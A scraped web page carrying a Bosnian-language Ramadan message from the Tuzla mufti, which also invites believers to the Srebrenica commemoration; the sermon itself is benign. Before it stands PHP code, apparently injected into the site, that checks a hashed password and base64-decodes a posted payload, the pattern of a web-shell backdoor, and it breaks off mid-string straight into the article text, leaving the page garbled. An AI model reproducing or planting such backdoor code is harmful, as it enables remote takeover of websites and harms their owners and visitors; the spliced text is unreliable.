function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Ramazanska poruka muftije tuzlanskog - Medžlis Islamske zajednice Bijeljina

Ramazanska poruka muftije tuzlanskog

Ramazanska poruka muftije tuzlanskog

www.muftijstvotz.ba…Bismillahirrahmanirrahim. Hvala Allahu, Gospodaru svjetova, Milostivom, Samilosnom. Salavate i selame upućujemo Njegovom vjerovjesniku i poslaniku Muhammedu, alejhis-selam.

Draga braćo i poštovane sestre.

Sutra, ako Bog da, započinje mubarek-ramazan, blagoslovljeni mjesec posta i drugih brojnih ibadeta. S jedinstvenom radošću i velikom nadom iščekujemo susret s ramazanskim blagodatima. Radujemo se i nadamo Allahovoj milosti i oprostu s kojima će naše duše zadobiti više mira i izvjesnosti. Potreban nam je predah koji ramazan donese, da, snagom pojačane duhovnosti, svedemo svoje račune i pokušamo dokučiti ono što je za nas najbolje da činimo u budućnosti.

Ramazan se nadaje i kao prilika za približavanje jednih drugima, posredstvom dobra koje ramazan isijava.

U ogledalu naše vjere naći će se u ramazanu naše duše i naša srca i, ako Bog da, doživjeti snažno pročišćenje i oplemenjivanje.

Ovogodišnji ramazan proticat će i u sjećanju i obilježavanju dvadesete godišnjice Genocida nad Bošnjacima. Pozivam vas da naše okupljanje u Srebrenici, u Potočarima, na dženazi 11. jula, bude u velikom broju i dostojanstveno, u skladu s tim časnim mjestom i ramazanskim vremenom.

Braćo i sestre.

Svim muslimanima čestitam nastupanje ramazana. Želim da ga u zdravlju, miru i rahatluku provedu, da njegove dane s lahkoćom isposte i da se iz obilja Allahove milosti u ovome mjesecu obilno opskrbe. Pokažimo spremnost da darovane nam blagodati podijelimo s onima koji imaju više potreba od nas.

Ramazanske ibadete u što većoj mjeri obavljajmo, u nastojanju da ojačamo vlastite moralne vrline i unutrašnju snagu.

Iskoristimo ovo blagoslovljeno vrijeme za snaženje zajedništva naših porodica. Našim džematima pristupajmo otvorenih srca i iskrenih namjera kako bismo stanje muslimana popravljali, i da svi zajedno u sreći i blagostanju dočekamo bajram, dijeleći njegovu ljepotu s našim komšijama i svim ljudima.

Ramazan šerif mubarek olsun.